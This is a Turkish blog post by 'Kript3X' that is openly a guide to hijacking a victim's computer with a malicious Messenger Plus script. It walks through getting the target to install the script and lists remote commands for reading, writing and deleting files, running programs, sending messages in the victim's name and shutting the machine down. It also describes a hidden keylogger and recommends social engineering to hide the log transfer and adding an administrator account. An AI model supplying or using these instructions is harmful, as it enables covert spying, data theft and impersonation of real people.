MSN Plus Script Güvenliği

April 17, 2010 yazan Kript3X

Messenger Plus Script ile Bilgisayara Girmek

April 11, 2010 | By Kript3X In Bugtraq - Exploits - Vulnerabilities |

Merhaba, Sitemizin ilk dökümanında bu açığını sizlerle paylaşarak başlıyorum.. MSN plus ve scriptlerini dünyada 500 milyon’dan fazla insan kullanıyor. Pek fazla bir özelliği olmayan Msn Plus programı bir çok programcı tarafından geliştirilen Scriptleriyle populer hale geldi fakat  bu scriptler bilgisayarında güvenlik zaafı oluşturabiliyor. Size bu dökümanımda bunun nasıl yapılacağını ayrıntılı bir şekilde anlatacağım..

Öncelikle Scriptin çalışması için MSN Plus programının yüklü olması gerekiyor. Aşağıdaki zip’de 2 adet script bulunmakta. Bunlardan Install.plsc olan scripti sizin yüklemeniz gerek, Dmsn.plsc ‘yi ise hedef kişinin yüklemesi gerekiyor.

Scripts 

Script yüklemeyi bilmeyenler için,  Install.plsc yüklemeniz sırasında şöyle bir ekranla karşılacaksınız:

Scripti yüklemek için kutucuğuı işaretleyip AL butonuna tıklıyoruz ve ardından bir onay mesajı çıkacaktır.

Kurban kişiyede Dmsn.plsc Scriptini kurmasından sonra sizin Msn’inizden hedef kişinin msnine yazacağını kodlarla bilgisayara erişim sağlamış olacaksınız.Bu kodları ve çalışma mantığını aşağıdaki örneklerle açıklayacağım..

[Contact] : Bu komutu hedef kişiye gönderdiğiniz takdirde, Msn listesinde ki tüm adresler size otomatik olarak cevap gelecektir. Kırmızı olarak yazılı adresler kullanıcının çevrimdışı olduğunu, yeşil renkle gelen adresler ise çevrimiçi olduklarını belirtmektedir.

Scriptin en güzel yönlerinden biriyse bu bilgiler size gelirken hedef kişinin hiçbirşeyi görmemesidir. O bilgi akışını aşağıda da gördüğünüz gibi boş mesajlar olarak görmektedir.

[error]ERROR>Test Error Message : Bu komut ile ise, hedef bilgisayarda hata uyarısı alır.

Bilgisayardaki dosyalara erişim için kullanacağımız kodlara gelirsek,

[drives] Bilgisayardaki sürücüleri ve isimlerini gösterir.
[read]C:\\simple\text.txt Dosyayı görüntüler.
[write]C:\\simple.txt>Content Dosya oluşturur ve içerisini yazar.
[delete]C:\\simple.txt Belirli bir dosyayı siler.
[files]C:\\ Dosya içeriğini görüntüler.
[create]C:\\simple\ Klasör oluşturur.
[deletefolder]C:\\simple\ Klasörü siler.
[folders]C:\\ Dosyaları listeler.

Diğer kullanabileceğiniz kodlar:

[chat]x@hotmail.com message Belirtilen adrese msn üzerinden istediğiniz metni hedefin bilgisayarında onun adına yollar.
[all]message Hedefin msnindeki tüm kullanıcılara mesaj gönderir.
[block]x@hotmail.com Belirtilen kullanıcıyı engeller.
[showstart] Windows’da startı gizler.
[hidestart] Windows’da startı gösterir.
[run]calc.exe Istediğiniz uygulamayı çalıştırır.
[bat]shutdown -s -t 60 Bilgisayarı 60 saniye sonra kapatır.
[bat]shutdown -r -t 60 Bilgisayarı 60 saniye sonra restart yapar.
[beep]1000 1000 Beep kitlenme sesi gönderir.
[process] Çalışan programlar listesini gösterir.
[freeze] MSN’i kilitler.
[Url] Istediğiniz web adresini açar.

[SPY] Bu komutu ile hedef bilgisayardaki yazılan herşeyi keylogger sayesinde alabilirsiniz. Kayıtları alma işlemi sizin kodu göndermeniz ardından otomatik olarak hedef bilgisayardan log dosyası gelmektedir, normal dosya gönderir gibi gerçekleşen bu işlemi malesef hedef bilgisayarda görebilmektedir bu yüzden dikkat etmeniz gerekmekte. Bir kaç saniyede biticek bu işlemi hedefin farketmemesi için sosyal mühendislik tekniklerini kullanabilirsiniz, kurbanın dikkatini dağıtacak bir web sayfası açıp dosya aktarımını tamamlayınca ise bilgisayara restart komutunu yollayabilirsiniz 
Bundan sonrası için ise, yapabilecekleriniz sizin hayal gücünüze kalmış.. [bat] komutu ile msdos’da kullandığınız tüm komutları hedef bilgisayarda çalıştırabilirsiniz, yeni administrator kullanıcı ekleyerek uzak masaüstü bağlantısı yapabilir veya diğer geniş msdos komutları kullanarak istediğinizi hedef bilgisayardan alabilirsiniz..
Ilk dökümanımın sonuna gelmiş bulunmaktayım, yakın zamanda farklı bir dökümanda görüşmek üzere..
Kript3X
http://tobedifferent.net/bilisim-teknolojileri/bugtraq-exploits-vulnerabilities/messenger-plus-script-bilgisayara-girmek/